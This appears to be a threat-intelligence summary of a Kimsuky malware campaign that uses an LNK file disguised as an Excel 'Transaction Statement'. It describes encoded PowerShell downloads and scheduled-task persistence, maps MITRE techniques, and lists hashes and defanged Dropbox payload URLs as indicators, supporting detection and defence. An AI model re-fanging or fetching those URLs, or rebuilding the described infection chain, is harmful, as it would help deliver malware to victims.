This article discusses the Kimsuky hacking group from North Korea and their malicious code ‘Transaction Statement (2024, 10, 02)’. The malware disguises itself as an Excel file and executes various PowerShell scripts to download additional malicious payloads. The purpose appears to be targeting small to medium-sized enterprises, potentially for data theft. Affected: Kimsuky, North Korean Hacking, Small and Medium Enterprises
Keypoints :
- North Korean hacking group Kimsuky has developed a new malware called ‘Transaction Statement’ which disguises as an Excel file.
- The malware file is a LNK file with various encoded script actions embedded inside.
- Base64 encoded PowerShell code is used to download and execute malicious files from unknown sources.
- A ‘Scheduled Task’ registers malicious scripts to ensure continued execution without user detection.
- Targeting appears to focus on small to medium enterprises and possibly defense-related companies for information theft.
MITRE Techniques :
- T1071.001: Application Layer Protocol – PowerShell scripts are executed to download additional malware and resources from remote locations.
- T1203: Exploitation for Client Execution – The malware tricks users by simulating an Excel file to execute malicious scripts.
- T1036.005: Masquerading – The LNK file masquerading as an Excel document to entice the victim to open it.
- T1059.001: Command and Scripting Interpreter: PowerShell – Utilizes PowerShell to execute encoded malicious scripts and manage scheduled tasks.
Indicator of Compromise :
- MD5 cdb9a352597f10b8539d61c4b7f4d64c
- SHA-1 8b6bf5f4ec7045386ee8a0335b7ab7059fe3cf9e
- SHA-256 acbc775087da23725c3d783311d5f5083c93658de392c17994a9151447ac2b63
- URL hxxps://dl.dropboxusercontent.com/scl/fi/slx06ol4j(m)jqn16icggin/.pptx?rlkey=lky2lit(5)lpthkcscfnz3f91oa&st=gwpkys9h&dl=0
- URL hxxps://dl.dropboxusercontent.com/scl/fi/nanwt6elsu(x)ziz05hnlt4/cjfansgmlans1-x(.)txt?rlkey=l6gzro1r(s)wkqbk6tinxnkuyl&st=iv78c1cg&dl=0
Full Story: https://wezard4u.tistory.com/429399